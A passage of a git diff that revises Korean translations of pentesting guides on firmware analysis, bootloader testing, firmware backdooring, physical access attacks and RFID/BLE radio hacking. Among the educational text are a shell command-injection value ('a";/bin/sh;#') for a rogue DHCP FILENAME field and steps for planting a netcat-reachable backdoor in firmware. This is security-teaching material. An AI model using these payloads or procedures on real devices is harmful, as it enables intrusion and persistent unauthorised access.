-| ⌘⌥F (Command-Option/Alt-F) | 메일박스에서 검색           |
+| ⌘R                         | 현재 탭 새로 고침          |
+| ⌘.                         | 현재 탭 로딩 중지          |
+| ⌘⌥F (Command-Option/Alt-F) | 메일박스에서 검색          |
 
 # 참고 문헌
 
diff --git a/src/physical-attacks/firmware-analysis/README.md b/src/physical-attacks/firmware-analysis/README.md
index 42b3d425c..808bc31d6 100644
--- a/src/physical-attacks/firmware-analysis/README.md
+++ b/src/physical-attacks/firmware-analysis/README.md
@@ -48,7 +48,7 @@ hexdump -C -n 512 <bin> > hexdump.out
 hexdump -C <bin> | head # might find signatures in header
 fdisk -lu <bin> #lists a drives partition and filesystems if multiple
 ```
-해당 도구로 많은 것을 찾지 못한 경우, `binwalk -E <bin>`로 이미지의 **엔트로피**를 확인하세요. 엔트로피가 낮으면 암호화되지 않았을 가능성이 높습니다. 엔트로피가 높으면 암호화되었거나 어떤 방식으로든 압축되었을 가능성이 있습니다.
+해당 도구로 많은 것을 찾지 못한 경우, `binwalk -E <bin>`로 이미지의 **엔트로피**를 확인하세요. 엔트로피가 낮으면 암호화되지 않았을 가능성이 높습니다. 엔트로피가 높으면 암호화되었거나 어떤 방식으로든 압축되었을 가능성이 높습니다.
 
 또한, 이러한 도구를 사용하여 **펌웨어에 내장된 파일**을 추출할 수 있습니다:
 
@@ -65,7 +65,7 @@ Binwalk는 일반적으로 **파일 시스템 유형으로 명명된 폴더** 
 
 #### 수동 파일 시스템 추출
 
-때때로, binwalk는 **파일 시스템의 매직 바이트를 시그니처에 포함하지 않을 수 있습니다**. 이러한 경우, binwalk를 사용하여 **파일 시스템의 오프셋을 찾고 이진 파일에서 압축된 파일 시스템을 조각내고** 아래 단계에 따라 파일 시스템을 **수동으로 추출**하세요.
+때때로, binwalk는 **서명에 파일 시스템의 매직 바이트가 없을 수 있습니다**. 이러한 경우, binwalk를 사용하여 **파일 시스템의 오프셋을 찾고 이진 파일에서 압축된 파일 시스템을 조각내고** 아래 단계에 따라 파일 시스템을 **수동으로 추출**하세요.
 ```
 $ binwalk DIR850L_REVB.bin
 
@@ -113,11 +113,11 @@ $ dd if=DIR850L_REVB.bin bs=1 skip=1704084 of=dir.squashfs
 
 ## 펌웨어 분석
 
-펌웨어를 얻은 후, 그 구조와 잠재적 취약점을 이해하기 위해 분석하는 것이 필수적입니다. 이 과정은 다양한 도구를 활용하여 펌웨어 이미지에서 귀중한 데이터를 분석하고 추출하는 것을 포함합니다.
+펌웨어를 얻은 후, 그 구조와 잠재적 취약점을 이해하기 위해 분석하는 것이 필수적입니다. 이 과정은 펌웨어 이미지에서 귀중한 데이터를 분석하고 추출하기 위해 다양한 도구를 활용하는 것을 포함합니다.
 
 ### 초기 분석 도구
 
-이진 파일( `<bin>`으로 언급됨)의 초기 검사를 위한 명령어 세트가 제공됩니다. 이 명령어들은 파일 유형을 식별하고, 문자열을 추출하며, 이진 데이터를 분석하고, 파티션 및 파일 시스템 세부 정보를 이해하는 데 도움을 줍니다:
+이진 파일( `<bin>`으로 언급됨)의 초기 검사를 위한 명령어 세트가 제공됩니다. 이 명령어는 파일 유형을 식별하고, 문자열을 추출하며, 이진 데이터를 분석하고, 파티션 및 파일 시스템 세부 정보를 이해하는 데 도움이 됩니다:
 ```bash
 file <bin>
 strings -n8 <bin>
@@ -149,7 +149,7 @@ $ dd if=DIR850L_REVB.bin bs=1 skip=1704084 of=dir.squashfs
 - 사용자 자격 증명을 위한 **etc/shadow** 및 **etc/passwd**
 - **etc/ssl**의 SSL 인증서 및 키
 - 잠재적 취약점을 위한 구성 및 스크립트 파일
-- 추가 분석을 위한 내장 바이너리
+- 추가 분석을 위한 임베디드 바이너리
 - 일반 IoT 장치 웹 서버 및 바이너리
 
 여러 도구가 파일 시스템 내에서 민감한 정보와 취약점을 발견하는 데 도움을 줍니다:
@@ -164,15 +164,15 @@ $ dd if=DIR850L_REVB.bin bs=1 skip=1704084 of=dir.squashfs
 
 ## 동적 분석을 위한 펌웨어 에뮬레이션
 
-펌웨어를 에뮬레이트하는 과정은 장치의 작동 또는 개별 프로그램의 **동적 분석**을 가능하게 합니다. 이 접근 방식은 하드웨어 또는 아키텍처 의존성으로 인해 어려움이 발생할 수 있지만, 루트 파일 시스템이나 특정 바이너리를 Raspberry Pi와 같은 일치하는 아키텍처 및 엔디안성을 가진 장치로 전송하거나 미리 구축된 가상 머신으로 전송하면 추가 테스트를 용이하게 할 수 있습니다.
+펌웨어를 에뮬레이션하는 과정은 장치의 작동 또는 개별 프로그램의 **동적 분석**을 가능하게 합니다. 이 접근 방식은 하드웨어 또는 아키텍처 의존성으로 인해 어려움이 발생할 수 있지만, 루트 파일 시스템이나 특정 바이너리를 Raspberry Pi와 같은 일치하는 아키텍처 및 엔디안성을 가진 장치로 전송하거나 미리 구축된 가상 머신으로 전송하면 추가 테스트를 용이하게 할 수 있습니다.
 
 ### 개별 바이너리 에뮬레이션
 
-단일 프로그램을 검사하기 위해 프로그램의 엔디안성과 CPU 아키텍처를 식별하는 것이 중요합니다.
+단일 프로그램을 검사하기 위해서는 프로그램의 엔디안성과 CPU 아키텍처를 식별하는 것이 중요합니다.
 
 #### MIPS 아키텍처 예시
 
-MIPS 아키텍처 바이너리를 에뮬레이트하려면 다음 명령을 사용할 수 있습니다:
+MIPS 아키텍처 바이너리를 에뮬레이션하려면 다음 명령을 사용할 수 있습니다:
 ```bash
 file ./squashfs-root/bin/busybox
 ```
@@ -184,7 +184,7 @@ MIPS (빅 엔디안)의 경우 `qemu-mips`가 사용되며, 리틀 엔디안 바
 
 #### ARM 아키텍처 에뮬레이션
 
-ARM 바이너리의 경우, 프로세스는 유사하며 `qemu-arm` 에뮬레이터가 에뮬레이션에 사용됩니다.
+ARM 바이너리의 경우, 프로세스는 유사하며, 에뮬레이션을 위해 `qemu-arm` 에뮬레이터가 사용됩니다.
 
 ### 전체 시스템 에뮬레이션
 
@@ -192,7 +192,7 @@ ARM 바이너리의 경우, 프로세스는 유사하며 `qemu-arm` 에뮬레이
 
 ## 동적 분석 실습
 
-이 단계에서는 실제 또는 에뮬레이션된 장치 환경을 사용하여 분석을 수행합니다. OS 및 파일 시스템에 대한 셸 접근을 유지하는 것이 중요합니다. 에뮬레이션이 하드웨어 상호작용을 완벽하게 모방하지 못할 수 있으므로 가끔 에뮬레이션을 재시작해야 할 필요가 있습니다. 분석은 파일 시스템을 재검토하고, 노출된 웹페이지 및 네트워크 서비스를 이용하며, 부트로더 취약점을 탐색해야 합니다. 펌웨어 무결성 테스트는 잠재적인 백도어 취약점을 식별하는 데 중요합니다.
+이 단계에서는 실제 또는 에뮬레이션된 장치 환경을 사용하여 분석을 수행합니다. OS 및 파일 시스템에 대한 셸 액세스를 유지하는 것이 중요합니다. 에뮬레이션이 하드웨어 상호작용을 완벽하게 모방하지 못할 수 있으므로 가끔 에뮬레이션을 재시작해야 할 필요가 있습니다. 분석은 파일 시스템을 재검토하고, 노출된 웹페이지 및 네트워크 서비스를 악용하며, 부트로더 취약점을 탐색해야 합니다. 펌웨어 무결성 테스트는 잠재적인 백도어 취약점을 식별하는 데 중요합니다.
 
 ## 런타임 분석 기법
 
@@ -213,7 +213,7 @@ ARM 바이너리의 경우, 프로세스는 유사하며 `qemu-arm` 에뮬레이
 
 ## 연습을 위한 취약한 펌웨어
 
-펌웨어에서 취약점을 발견하는 연습을 위해 다음의 취약한 펌웨어 프로젝트를 시작점으로 사용하세요.
+펌웨어에서 취약점을 발견하는 연습을 위해 다음의 취약한 펌웨어 프로젝트를 시작점으로 사용하십시오.
 
 - OWASP IoTGoat
 - [https://github.com/OWASP/IoTGoat](https://github.com/OWASP/IoTGoat)
diff --git a/src/physical-attacks/firmware-analysis/bootloader-testing.md b/src/physical-attacks/firmware-analysis/bootloader-testing.md
index afca28e5a..b6e7f32aa 100644
--- a/src/physical-attacks/firmware-analysis/bootloader-testing.md
+++ b/src/physical-attacks/firmware-analysis/bootloader-testing.md
@@ -38,12 +38,12 @@
 
 6. **주의할 하드웨어 간섭**:
 
-- 장치 부팅 시퀀스 중 하나의 핀을 접지에 연결하고 SPI 또는 NAND 플래시 칩과 상호작용할 때 주의하십시오. 특히 커널이 압축 해제되기 전에 핀을 단락시키기 전에 NAND 플래시 칩의 데이터시트를 참조하십시오.
+- 장치 부팅 시퀀스 중 하나의 핀을 접지에 연결하고 SPI 또는 NAND 플래시 칩과 상호작용할 때 주의하십시오, 특히 커널이 압축 해제되기 전에. 핀을 단락시키기 전에 NAND 플래시 칩의 데이터 시트를 참조하십시오.
 
 7. **악성 DHCP 서버 구성**:
 - PXE 부팅 중 장치가 수신할 악성 매개변수를 가진 악성 DHCP 서버를 설정합니다. Metasploit의 (MSF) DHCP 보조 서버와 같은 도구를 사용하십시오. 'FILENAME' 매개변수를 `'a";/bin/sh;#'`와 같은 명령 주입 명령으로 수정하여 장치 시작 절차에 대한 입력 유효성 검사를 테스트합니다.
 
-**참고**: 장치 핀과의 물리적 상호작용을 포함하는 단계(\*별표로 표시된)는 장치 손상을 피하기 위해 극도로 주의하여 접근해야 합니다.
+**참고**: 장치 핀과의 물리적 상호작용을 포함하는 단계(\*별표로 표시된)는 장치를 손상시키지 않도록 극도로 주의하여 접근해야 합니다.
 
 ## References
 
diff --git a/src/physical-attacks/firmware-analysis/firmware-integrity.md b/src/physical-attacks/firmware-analysis/firmware-integrity.md
index ec7f7cf7b..d0702a825 100644
--- a/src/physical-attacks/firmware-analysis/firmware-integrity.md
+++ b/src/physical-attacks/firmware-analysis/firmware-integrity.md
@@ -8,13 +8,13 @@
 2. 대상 펌웨어 아키텍처와 엔디안 형식을 식별해야 합니다.
 3. Buildroot 또는 환경에 적합한 다른 방법을 사용하여 크로스 컴파일러를 구축할 수 있습니다.
 4. 크로스 컴파일러를 사용하여 백도어를 구축할 수 있습니다.
-5. 백도어는 추출된 펌웨어의 /usr/bin 디렉토리에 복사할 수 있습니다.
-6. 적절한 QEMU 바이너리는 추출된 펌웨어의 rootfs에 복사할 수 있습니다.
-7. chroot와 QEMU를 사용하여 백도어를 에뮬레이트할 수 있습니다.
+5. 백도어는 추출된 펌웨어 /usr/bin 디렉토리에 복사할 수 있습니다.
+6. 적절한 QEMU 바이너리는 추출된 펌웨어 rootfs에 복사할 수 있습니다.
+7. chroot와 QEMU를 사용하여 백도어를 에뮬레이션할 수 있습니다.
 8. netcat을 통해 백도어에 접근할 수 있습니다.
-9. QEMU 바이너리는 추출된 펌웨어의 rootfs에서 제거해야 합니다.
-10. 수정된 펌웨어는 FMK를 사용하여 재패키징할 수 있습니다.
-11. 백도어가 있는 펌웨어는 펌웨어 분석 툴킷 (FAT)으로 에뮬레이트하고 netcat을 사용하여 대상 백도어 IP와 포트에 연결하여 테스트할 수 있습니다.
+9. QEMU 바이너리는 추출된 펌웨어 rootfs에서 제거해야 합니다.
+10. 수정된 펌웨어는 FMK를 사용하여 재포장할 수 있습니다.
+11. 백도어가 있는 펌웨어는 펌웨어 분석 툴킷 (FAT)으로 에뮬레이션하고 netcat을 사용하여 대상 백도어 IP와 포트에 연결하여 테스트할 수 있습니다.
 
 동적 분석, 부트로더 조작 또는 하드웨어 보안 테스트를 통해 이미 루트 셸을 얻은 경우, 임플란트나 리버스 셸과 같은 미리 컴파일된 악성 바이너리를 실행할 수 있습니다. Metasploit 프레임워크와 'msfvenom'과 같은 자동화된 페이로드/임플란트 도구를 다음 단계에 따라 활용할 수 있습니다:
 
diff --git a/src/physical-attacks/physical-attacks.md b/src/physical-attacks/physical-attacks.md
index 63ed3194e..c5235e678 100644
--- a/src/physical-attacks/physical-attacks.md
+++ b/src/physical-attacks/physical-attacks.md
@@ -8,7 +8,7 @@
 
 하드웨어 조정이 불가능하거나 실용적이지 않은 상황에서는 **소프트웨어 도구**가 해결책을 제공합니다. **Kali Linux**와 같은 배포판으로 **Live CD/USB**에서 시스템을 실행하면 **_killCmos_** 및 **_CmosPWD_**와 같은 도구에 접근할 수 있어 BIOS 비밀번호 복구를 도와줍니다.
 
-BIOS 비밀번호가 알려지지 않은 경우, 잘못 입력하면 **세 번** 입력 후 일반적으로 오류 코드가 발생합니다. 이 코드는 [https://bios-pw.org](https://bios-pw.org)와 같은 웹사이트에서 사용 가능한 비밀번호를 검색하는 데 사용할 수 있습니다.
+BIOS 비밀번호가 알려지지 않은 경우, 잘못 입력하면 일반적으로 **세 번**의 오류 코드가 발생합니다. 이 코드는 [https://bios-pw.org](https://bios-pw.org)와 같은 웹사이트에서 사용 가능한 비밀번호를 검색하는 데 사용할 수 있습니다.
 
 ### UEFI 보안
 
@@ -18,17 +18,17 @@ BIOS 비밀번호가 알려지지 않은 경우, 잘못 입력하면 **세 번**
 
 ### RAM 분석 및 콜드 부트 공격
 
-RAM은 전원이 차단된 후 **1~2분** 동안 데이터를 유지합니다. 이 지속성은 액체 질소와 같은 차가운 물질을 적용하여 **10분**으로 연장할 수 있습니다. 이 연장된 기간 동안 **메모리 덤프**를 생성하여 **dd.exe** 및 **volatility**와 같은 도구로 분석할 수 있습니다.
+RAM은 전원이 차단된 후 잠시 동안 데이터를 유지하며, 보통 **1~2분** 동안 지속됩니다. 이 지속성은 액체 질소와 같은 차가운 물질을 적용하여 **10분**으로 연장할 수 있습니다. 이 연장된 기간 동안 **메모리 덤프**를 생성하여 **dd.exe** 및 **volatility**와 같은 도구로 분석할 수 있습니다.
 
 ### 직접 메모리 접근(DMA) 공격
 
-**INCEPTION**은 **DMA**를 통해 **물리적 메모리 조작**을 위해 설계된 도구로, **FireWire** 및 **Thunderbolt**와 같은 인터페이스와 호환됩니다. 이는 메모리를 패치하여 어떤 비밀번호도 수용하도록 하여 로그인 절차를 우회할 수 있게 합니다. 그러나 **Windows 10** 시스템에는 효과적이지 않습니다.
+**INCEPTION**은 **물리적 메모리 조작**을 위한 도구로, **FireWire** 및 **Thunderbolt**와 같은 인터페이스와 호환됩니다. 이는 메모리를 패치하여 어떤 비밀번호도 수용하도록 하여 로그인 절차를 우회할 수 있게 합니다. 그러나 **Windows 10** 시스템에는 효과적이지 않습니다.
 
 ### 시스템 접근을 위한 Live CD/USB
 
 **_sethc.exe_** 또는 **_Utilman.exe_**와 같은 시스템 바이너리를 **_cmd.exe_**의 복사본으로 변경하면 시스템 권한으로 명령 프롬프트에 접근할 수 있습니다. **chntpw**와 같은 도구를 사용하여 Windows 설치의 **SAM** 파일을 편집하여 비밀번호를 변경할 수 있습니다.
 
-**Kon-Boot**는 비밀번호를 알지 못하고도 Windows 시스템에 로그인할 수 있도록 Windows 커널 또는 UEFI를 일시적으로 수정하는 도구입니다. 더 많은 정보는 [https://www.raymond.cc](https://www.raymond.cc/blog/login-to-windows-administrator-and-linux-root-account-without-knowing-or-changing-current-password/)에서 확인할 수 있습니다.
+**Kon-Boot**는 Windows 커널 또는 UEFI를 일시적으로 수정하여 비밀번호를 모른 채 Windows 시스템에 로그인할 수 있도록 하는 도구입니다. 더 많은 정보는 [https://www.raymond.cc](https://www.raymond.cc/blog/login-to-windows-administrator-and-linux-root-account-without-knowing-or-changing-current-password/)에서 확인할 수 있습니다.
 
 ### Windows 보안 기능 처리
 
@@ -48,10 +48,10 @@ RAM은 전원이 차단된 후 **1~2분** 동안 데이터를 유지합니다. 
 
 ### BitLocker 암호화 우회
 
-BitLocker 암호화는 **복구 비밀번호**가 메모리 덤프 파일(**MEMORY.DMP**) 내에서 발견될 경우 우회할 수 있습니다. 이를 위해 **Elcomsoft Forensic Disk Decryptor** 또는 **Passware Kit Forensic**와 같은 도구를 사용할 수 있습니다.
+**MEMORY.DMP** 파일 내에서 **복구 비밀번호**를 찾으면 BitLocker 암호화를 우회할 수 있습니다. 이를 위해 **Elcomsoft Forensic Disk Decryptor** 또는 **Passware Kit Forensic**와 같은 도구를 사용할 수 있습니다.
 
 ### 복구 키 추가를 위한 사회 공학
 
-새로운 BitLocker 복구 키는 사회 공학 전술을 통해 추가할 수 있으며, 사용자가 제로로 구성된 새로운 복구 키를 추가하는 명령을 실행하도록 설득하여 복호화 과정을 단순화할 수 있습니다.
+사회 공학 전술을 통해 새로운 BitLocker 복구 키를 추가할 수 있으며, 사용자가 새로운 복구 키를 추가하는 명령을 실행하도록 설득하여 복호화 과정을 단순화할 수 있습니다.
 
 {{#include ../banners/hacktricks-training.md}}
diff --git a/src/radio-hacking/low-power-wide-area-network.md b/src/radio-hacking/low-power-wide-area-network.md
index 65db13cbe..486986814 100644
--- a/src/radio-hacking/low-power-wide-area-network.md
+++ b/src/radio-hacking/low-power-wide-area-network.md
@@ -7,7 +7,7 @@
 **저전력 광역 네트워크** (LPWAN)은 **저비트 전송**을 위한 **장거리 통신**을 설계한 무선 저전력 광역 네트워크 기술 그룹입니다.\
 이들은 **6마일** 이상 도달할 수 있으며, **배터리**는 최대 **20년**까지 지속될 수 있습니다.
 
-장거리(**LoRa**)는 여러 국가에서 인기가 있으며, **LoRaWAN**이라는 오픈 소스 사양이 있습니다.
+장거리 통신 (**LoRa**)는 여러 국가에서 인기가 있으며, **LoRaWAN**이라는 오픈 소스 사양이 있습니다.
 
 ### LPWAN, LoRa 및 LoRaWAN
 
diff --git a/src/radio-hacking/pentesting-ble-bluetooth-low-energy.md b/src/radio-hacking/pentesting-ble-bluetooth-low-energy.md
index 1ae0e3ff3..886652a0c 100644
--- a/src/radio-hacking/pentesting-ble-bluetooth-low-energy.md
+++ b/src/radio-hacking/pentesting-ble-bluetooth-low-energy.md
@@ -10,7 +10,7 @@ BLE 장치는 **광고 패킷**(**비콘**)을 전송하여 통신하며, 이 
 
 ![](<../images/image (201) (2) (1) (1).png>)
 
-프리앰블 바이트는 주파수를 동기화하며, 4바이트 접근 주소는 **연결 식별자**로, 여러 장치가 동일한 채널에서 연결을 시도하는 시나리오에서 사용됩니다. 다음으로, 프로토콜 데이터 단위(**PDU**)는 **광고 데이터**를 포함합니다. 여러 유형의 PDU가 있으며, 가장 일반적으로 사용되는 것은 ADV_NONCONN_IND와 ADV_IND입니다. 장치는 **연결을 수락하지 않는 경우** **ADV_NONCONN_IND** PDU 유형을 사용하여 광고 패킷에서만 데이터를 전송합니다. 장치는 **연결을 허용하는 경우** **ADV_IND**를 사용하며, **연결**이 **설립**되면 광고 패킷 전송을 중단합니다.
+프리앰블 바이트는 주파수를 동기화하며, 4바이트 접근 주소는 **연결 식별자**로, 여러 장치가 동일한 채널에서 연결을 시도하는 시나리오에서 사용됩니다. 다음으로, 프로토콜 데이터 단위(**PDU**)는 **광고 데이터**를 포함합니다. 여러 유형의 PDU가 있으며, 가장 일반적으로 사용되는 것은 ADV_NONCONN_IND와 ADV_IND입니다. 장치가 **연결을 수락하지 않는 경우**에는 **ADV_NONCONN_IND** PDU 유형을 사용하여 광고 패킷에서만 데이터를 전송합니다. 장치가 **연결을 허용하는 경우**에는 **ADV_IND**를 사용하며, **연결**이 **설립**되면 광고 패킷 전송을 중단합니다.
 
 ## GATT
 
diff --git a/src/radio-hacking/pentesting-rfid.md b/src/radio-hacking/pentesting-rfid.md
index b7725e603..d5ca2765e 100644
--- a/src/radio-hacking/pentesting-rfid.md
+++ b/src/radio-hacking/pentesting-rfid.md
@@ -6,13 +6,13 @@
 
 **Radio Frequency Identification (RFID)**는 가장 인기 있는 단거리 무선 솔루션입니다. 일반적으로 엔티티를 식별하는 정보를 저장하고 전송하는 데 사용됩니다.
 
-RFID 태그는 **자체 전원 공급 장치(능동형)**에 의존할 수 있으며, 내장 배터리와 같은 방식이거나 수신된 전파에서 유도된 전류를 사용하여 판독 안테나로부터 전원을 받을 수 있습니다(**수동형**).
+RFID 태그는 **자체 전원 공급 장치(능동형)**에 의존할 수 있으며, 내장 배터리와 같은 방식으로 작동하거나 수신된 전파에서 유도된 전류를 사용하여 판독 안테나로부터 전원을 받을 수 있습니다(**수동형**).
 
 ### Classes
 
 EPCglobal은 RFID 태그를 여섯 가지 범주로 나눕니다. 각 범주의 태그는 이전 범주에 나열된 모든 기능을 갖추고 있어 하위 호환성을 제공합니다.
 
-- **Class 0** 태그는 **수동형** 태그로 **UHF** 대역에서 작동합니다. 공급업체가 생산 공장에서 **미리 프로그래밍**합니다. 결과적으로, 이들의 메모리에 저장된 정보를 **변경할 수 없습니다**.
+- **Class 0** 태그는 **UHF** 대역에서 작동하는 **수동형** 태그입니다. 공급업체가 생산 공장에서 미리 프로그래밍합니다. 결과적으로, 이들의 메모리에 저장된 정보를 **변경할 수 없습니다**.
 - **Class 1** 태그는 **HF** 대역에서도 작동할 수 있습니다. 또한, 생산 후 **한 번만 기록**할 수 있습니다. 많은 Class 1 태그는 수신한 명령의 **순환 중복 검사**(CRC)를 처리할 수 있습니다. CRC는 오류 감지를 위한 명령 끝에 있는 몇 바이트의 추가 데이터입니다.
 - **Class 2** 태그는 **여러 번 기록**할 수 있습니다.
 - **Class 3** 태그는 현재 온도나 태그의 움직임과 같은 환경 매개변수를 기록할 수 있는 **내장 센서**를 포함할 수 있습니다. 이러한 태그는 **반수동형**으로, 내장 전원 공급 장치(예: 통합 **배터리**)가 있지만 다른 태그나 판독기와 무선 **통신을 시작할 수 없습니다**.
@@ -23,9 +23,9 @@ EPCglobal은 RFID 태그를 여섯 가지 범주로 나눕니다. 각 범주의
 
 RFID 태그의 메모리는 일반적으로 네 가지 종류의 데이터를 저장합니다: **식별 데이터**, 태그가 부착된 **엔티티**를 **식별**하는 데이터(이 데이터에는 사용자 정의 필드, 예: 은행 계좌가 포함됨); **보조 데이터**, 엔티티에 대한 **추가** **세부정보**를 제공하는 데이터; 태그의 내부 **구성**에 사용되는 **제어 데이터**; 그리고 태그의 **제조업체 데이터**, 태그의 고유 식별자(**UID**)와 태그의 **생산**, **유형**, 및 **공급업체**에 대한 세부정보를 포함합니다. 상업용 태그에서는 처음 두 가지 데이터 유형을 찾을 수 있으며, 마지막 두 가지는 태그의 공급업체에 따라 다를 수 있습니다.
 
-ISO 표준은 태그가 속한 **객체의 종류**를 나타내는 코드인 응용 프로그램 가족 식별자(**AFI**) 값을 지정합니다. ISO에서 지정한 또 다른 중요한 레지스터는 데이터 저장 형식 식별자(**DSFID**)로, **사용자 데이터의 논리적 구성**을 정의합니다.
+ISO 표준은 태그가 속한 **객체의 종류**를 나타내는 코드인 응용 프로그램 가족 식별자(**AFI**) 값을 지정합니다. ISO에서 지정한 또 다른 중요한 레지스터는 데이터 저장 형식 식별자(**DSFID**)로, **사용자 데이터의 논리적 조직**을 정의합니다.
 
-대부분의 RFID **보안 제어**는 각 사용자 메모리 블록 및 AFI와 DSFID 값을 포함하는 특수 레지스터에 대한 **읽기** 또는 **쓰기** 작업을 **제한**하는 메커니즘을 가지고 있습니다. 이러한 **잠금** **메커니즘**은 제어 메모리에 저장된 데이터를 사용하며, 공급업체에 의해 미리 구성된 **기본 비밀번호**를 가지고 있지만 태그 소유자가 **사용자 정의 비밀번호**를 구성할 수 있도록 허용합니다.
+대부분의 RFID **보안 제어**는 각 사용자 메모리 블록 및 AFI와 DSFID 값을 포함하는 특수 레지스터에 대한 **읽기** 또는 **쓰기** 작업을 **제한**하는 메커니즘을 가지고 있습니다. 이러한 **잠금** **메커니즘**은 제어 메모리에 저장된 데이터를 사용하며 공급업체가 미리 구성한 **기본 비밀번호**를 가지고 있지만 태그 소유자가 **사용자 정의 비밀번호**를 구성할 수 있도록 허용합니다.
 
 ### Low & High frequency tags comparison
 
@@ -33,21 +33,21 @@ ISO 표준은 태그가 속한 **객체의 종류**를 나타내는 코드인 
 
 ## Low-Frequency RFID Tags (125kHz)
 
-**저주파 태그**는 종종 **높은 보안이 필요하지 않은** 시스템에서 사용됩니다: 건물 출입, 인터콤 키, 체육관 회원 카드 등. 더 긴 범위 덕분에 유료 주차에 사용하기 편리합니다: 운전자는 카드를 판독기에 가까이 가져갈 필요가 없으며, 더 멀리서도 작동합니다. 동시에 저주파 태그는 매우 원시적이며 데이터 전송 속도가 낮습니다. 이러한 이유로 잔액 유지 및 암호화와 같은 복잡한 양방향 데이터 전송을 구현할 수 없습니다. 저주파 태그는 인증 수단 없이 짧은 ID만 전송합니다.
+**저주파 태그**는 종종 **높은 보안이 필요하지 않은** 시스템에서 사용됩니다: 건물 출입, 인터콤 키, 체육관 회원 카드 등. 더 높은 범위 덕분에 유료 주차에 사용하기 편리합니다: 운전자는 카드를 판독기에 가까이 가져갈 필요가 없으며, 더 멀리서도 작동합니다. 동시에 저주파 태그는 매우 원시적이며 데이터 전송 속도가 낮습니다. 이러한 이유로 잔액 유지 및 암호화와 같은 복잡한 양방향 데이터 전송을 구현할 수 없습니다. 저주파 태그는 인증 수단 없이 짧은 ID만 전송합니다.
 
 이 장치는 **수동형** **RFID** 기술에 의존하며 **30 kHz에서 300 kHz** 범위에서 작동하지만, 일반적으로 125 kHz에서 134 kHz를 사용합니다:
 
-- **긴 범위** — 낮은 주파수는 더 높은 범위로 이어집니다. EM-Marin 및 HID 판독기가 있으며, 최대 1미터 거리에서 작동합니다. 이러한 태그는 종종 주차장에서 사용됩니다.
+- **긴 범위** — 낮은 주파수는 더 높은 범위로 이어집니다. EM-Marin 및 HID 판독기가 있으며, 최대 1미터 거리에서 작동합니다. 이러한 태그는 주차장에서 자주 사용됩니다.
 - **원시 프로토콜** — 낮은 데이터 전송 속도로 인해 이러한 태그는 짧은 ID만 전송할 수 있습니다. 대부분의 경우 데이터는 인증되지 않으며 어떤 방식으로도 보호되지 않습니다. 카드가 판독기의 범위에 들어가면 ID를 전송하기 시작합니다.
-- **낮은 보안** — 이러한 카드는 쉽게 복사되거나 심지어 다른 사람의 주머니에서 읽힐 수 있습니다. 프로토콜이 원시적이기 때문입니다.
+- **낮은 보안** — 이러한 카드는 쉽게 복사되거나 심지어 다른 사람의 주머니에서 읽힐 수 있습니다.
 
 **인기 있는 125 kHz 프로토콜:**
 
 - **EM-Marin** — EM4100, EM4102. CIS에서 가장 인기 있는 프로토콜입니다. 단순성과 안정성 덕분에 약 1미터 거리에서 읽을 수 있습니다.
 - **HID Prox II** — HID Global에서 도입한 저주파 프로토콜입니다. 이 프로토콜은 서구 국가에서 더 인기가 있습니다. 더 복잡하며 이 프로토콜에 대한 카드와 판독기는 상대적으로 비쌉니다.
-- **Indala** — Motorola에서 도입한 매우 오래된 저주파 프로토콜로, 이후 HID에 인수되었습니다. 이전 두 프로토콜에 비해 사용이 줄어들고 있어 실제로 만날 가능성이 적습니다.
+- **Indala** — Motorola에서 도입한 매우 오래된 저주파 프로토콜로, 이후 HID에 인수되었습니다. 이전 두 프로토콜에 비해 사용이 줄어들고 있어 실제로는 덜 접할 수 있습니다.
 
-실제로는 더 많은 저주파 프로토콜이 존재합니다. 그러나 이들은 모두 물리적 레이어에서 동일한 변조를 사용하며, 나열된 프로토콜의 변형으로 간주될 수 있습니다.
+실제로는 더 많은 저주파 프로토콜이 존재합니다. 그러나 이들은 모두 물리적 계층에서 동일한 변조를 사용하며, 나열된 프로토콜의 변형으로 간주될 수 있습니다.
 
 ### Attack
 
@@ -62,7 +62,7 @@ You can **attack these Tags with the Flipper Zero**:
 **고주파 태그**는 암호화, 대규모 양방향 데이터 전송, 인증 등이 필요할 때 더 복잡한 판독기-태그 상호작용에 사용됩니다.\
 일반적으로 은행 카드, 대중 교통 및 기타 보안 패스에서 발견됩니다.
 
-**고주파 13.56 MHz 태그는 일련의 표준 및 프로토콜**입니다. 일반적으로 [NFC](https://nfc-forum.org/what-is-nfc/about-the-technology/)라고 불리지만, 항상 정확한 것은 아닙니다. 물리적 및 논리적 수준에서 사용되는 기본 프로토콜 세트는 ISO 14443입니다. 고급 프로토콜과 대체 표준(예: ISO 19092)은 이를 기반으로 합니다. 많은 사람들이 이 기술을 **근거리 통신(NFC)**이라고 부르며, 이는 13.56 MHz 주파수에서 작동하는 장치에 대한 용어입니다.
+**고주파 13.56 MHz 태그는 일련의 표준 및 프로토콜**입니다. 일반적으로 [NFC](https://nfc-forum.org/what-is-nfc/about-the-technology/)라고 불리지만, 항상 정확한 것은 아닙니다. 물리적 및 논리적 수준에서 사용되는 기본 프로토콜 세트는 ISO 14443입니다. 고급 프로토콜과 대체 표준(예: ISO 19092)은 이를 기반으로 합니다. 많은 사람들이 이 기술을 **근거리 통신(NFC)**이라고 부르며, 이는 13.56 MHz 주파수에서 작동하는 장치를 위한 용어입니다.
 
 <figure><img src="../images/image (22).png" alt=""><figcaption></figcaption></figure>
 
@@ -70,12 +70,12 @@ You can **attack these Tags with the Flipper Zero**:
 
 Flipper는 저수준 ISO 14443 프로토콜과 Mifare Ultralight 데이터 전송 프로토콜 및 은행 카드에서 사용되는 EMV와 상호작용할 수 있습니다. Mifare Classic 및 NFC NDEF에 대한 지원 추가 작업을 진행 중입니다. NFC를 구성하는 프로토콜 및 표준에 대한 철저한 검토는 별도의 기사로 다룰 가치가 있으며, 나중에 게시할 계획입니다.
 
-ISO 14443-A 표준을 기반으로 하는 모든 고주파 카드는 고유한 칩 ID를 가지고 있습니다. 이는 카드의 일련 번호로 작용하며, 네트워크 카드의 MAC 주소와 유사합니다. **일반적으로 UID는 4 또는 7 바이트 길이**이지만, 드물게 **10 바이트**까지 갈 수 있습니다. UID는 비밀이 아니며 쉽게 읽을 수 있으며, **때때로 카드 자체에 인쇄되어 있습니다**.
+ISO 14443-A 표준을 기반으로 하는 모든 고주파 카드는 고유한 칩 ID를 가지고 있습니다. 이는 카드의 일련 번호로 작용하며, 네트워크 카드의 MAC 주소와 유사합니다. **일반적으로 UID는 4 또는 7 바이트 길이**이지만, 드물게 **10 바이트까지** 갈 수 있습니다. UID는 비밀이 아니며 쉽게 읽을 수 있으며, **때때로 카드 자체에 인쇄되어 있습니다**.
 
